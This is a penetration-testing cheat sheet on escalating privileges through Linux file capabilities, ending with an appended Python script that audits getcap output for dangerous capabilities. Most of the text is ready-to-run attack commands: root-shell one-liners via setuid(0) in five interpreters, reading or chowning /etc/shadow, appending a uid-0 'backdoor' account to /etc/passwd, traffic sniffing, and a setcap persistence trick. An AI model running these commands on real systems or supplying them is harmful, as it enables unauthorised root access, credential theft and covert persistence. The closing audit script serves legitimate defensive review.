
Overview

Linux capabilities split root privileges into smaller units. A binary with specific capabilities can perform privileged operations without being SUID root.

Find Binaries with Capabilities

getcap -r / 2>/dev/null

Dangerous Capabilities

cap_setuid (ep)

Binary can change its UID → instant root.

python

python3 -c 'import os; os.setuid(0); os.system("/bin/bash")'

perl

perl -e 'use POSIX qw(setuid); POSIX::setuid(0); exec "/bin/bash";'

ruby

ruby -e 'Process::Sys.setuid(0); exec "/bin/bash"'

php

php -r 'posix_setuid(0); system("/bin/bash");'

node

node -e 'process.setuid(0); require("child_process").spawn("/bin/bash", {stdio: [0,1,2]})'

cap_dac_read_search

Bypass file read permission checks. Read any file.

tar

tar czf /tmp/shadow.tar.gz /etc/shadow
tar xzf /tmp/shadow.tar.gz
cat etc/shadow

openssl (custom binary)

openssl enc -in /etc/shadow

cap_dac_override

Bypass file write permission checks. Write to any file.

python

# cap_dac_override on the interpreter is enough to bypass the write check on /etc/passwd;
# no setuid call is needed (and os.setuid(0) would raise PermissionError without cap_setuid).
# The $(...) shell substitution does not expand inside a Python string literal, so the
# password hash has to be generated beforehand (e.g. with `openssl passwd -1`) and pasted in.
with open('/etc/passwd', 'a') as f:
    f.write('backdoor:<HASH>:0:0::/root:/bin/bash\n')  # replace <HASH> with the precomputed hash

vim

vim /etc/shadow

cap_chown

Change ownership of any file.

# If python has cap_chown
python3 -c 'import os; os.chown("/etc/shadow", 1000, 1000)'
cat /etc/shadow

cap_fowner

Bypass permission checks on file owner operations.

# Change permissions on any file (chmod binary has cap_fowner)
chmod 777 /etc/shadow

cap_net_raw

Capture network traffic. Sniff credentials.

tcpdump -i any -w /tmp/capture.pcap

cap_net_bind_service

Bind to privileged ports (< 1024). Useful for phishing/MitM.

python3 -m http.server 80

cap_sys_ptrace

Attach to any process. Inject code into root process.

# Find root process
ps aux | grep root

# Inject shellcode via gdb or custom tool
python3 inject.py <ROOT_PID>

cap_sys_admin

Mount filesystems, various admin operations.

mount /dev/sda1 /mnt
cat /mnt/etc/shadow

Set Capabilities (If Root — Persistence)

cp /usr/bin/python3 /tmp/python3
setcap cap_setuid+ep /tmp/python3

Later:

/tmp/python3 -c 'import os; os.setuid(0); os.system("/bin/bash")'

Quick Reference

| Capability          | Impact              | Exploit                       |
|---------------------|---------------------|-------------------------------|
| cap_setuid          | Change UID to root  | python3/perl/ruby setuid(0)   |
| cap_dac_read_search | Read any file       | tar to exfil /etc/shadow      |
| cap_dac_override    | Write any file      | Modify /etc/passwd            |
| cap_chown           | Own any file        | chown shadow to user          |
| cap_fowner          | chmod any file      | chmod 777 /etc/shadow         |
| cap_net_raw         | Sniff traffic       | tcpdump credentials           |
| cap_sys_ptrace      | Inject into process | Attach to root PID            |
| cap_sys_admin       | Mount filesystems   | Mount /dev/sda, read shadow   |
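As an added audit helper (not part of the original page): the script below parses `getcap -r /` output in both the older `/path = cap+ep` and the newer `/path cap=ep` formats, and reports only the capabilities from the table above that are actually in a binary's effective set (a permitted-only `+p` is not exploitable until the program raises it). The `DANGEROUS` mapping, `Finding` type and sample lines are assumptions constructed for this example.

```python
import re
import subprocess
from collections import namedtuple

Finding = namedtuple("Finding", "path cap flags impact")

# Capabilities the table above treats as dangerous, with its impact column (constructed mapping).
DANGEROUS = {
    "cap_setuid": "change UID to root", "cap_dac_read_search": "read any file",
    "cap_dac_override": "write any file", "cap_chown": "own any file",
    "cap_fowner": "chmod any file", "cap_net_raw": "sniff traffic",
    "cap_sys_ptrace": "inject into process", "cap_sys_admin": "mount filesystems",
}

# One clause of cap_to_text output: names, an operator (= + -), then flag letters e/i/p.
CLAUSE_RE = re.compile(r"^([a-z0-9_,]+)([=+-])([eip]*)$")

def parse_getcap_line(line):
    """Return (path, {cap: flags}) for one getcap line, or None if it is not one.
    Handles '/bin/x = cap_a,cap_b+ep' (libcap < 2.41) and '/bin/x cap_a,cap_b=ep' (>= 2.41).
    Paths containing whitespace are not supported."""
    parts = line.split()
    if len(parts) < 2:
        return None
    path, clauses = parts[0], [p for p in parts[1:] if p != "="]
    caps = {}
    for clause in clauses:
        m = CLAUSE_RE.match(clause)
        if not m:
            return None
        names, op, flags = m.groups()
        for name in names.split(","):
            current = caps.get(name, "")
            if op == "-":
                caps[name] = "".join(f for f in current if f not in flags)
            else:  # '=' sets the flags, '+' adds them
                caps[name] = "".join(sorted(set(current + flags))) if op == "+" else flags
    return path, caps

def find_dangerous(getcap_output):
    """Flag every dangerous capability that is effective ('e') on some binary."""
    findings = []
    for line in getcap_output.splitlines():
        parsed = parse_getcap_line(line)
        if parsed:
            path, caps = parsed
            findings += [Finding(path, c, fl, DANGEROUS[c]) for c, fl in caps.items()
                         if c in DANGEROUS and "e" in fl]
    return findings

def audit_system():
    """Run the page's getcap -r / and classify the result (needs getcap installed)."""
    out = subprocess.run(["getcap", "-r", "/"], capture_output=True, text=True).stdout
    return find_dangerous(out)

# Constructed sample output: both formats, a multi-cap clause, and permitted-only entries.
SAMPLE = """/usr/bin/ping cap_net_raw=ep
/usr/bin/python3 = cap_setuid+ep
/usr/sbin/tcpdump = cap_net_admin,cap_net_raw+eip
/usr/bin/gdb = cap_sys_ptrace+p
/usr/bin/fping cap_net_raw=p
"""

if __name__ == "__main__":
    for f in find_dangerous(SAMPLE):
        print(f"{f.path}: {f.cap} ({f.flags}) -> {f.impact}")
```

Entries such as ping with cap_net_raw are expected on most distributions, so the report is a review list, not a verdict; the unexpected ones (an interpreter with cap_setuid, as in the persistence trick above) are what to chase.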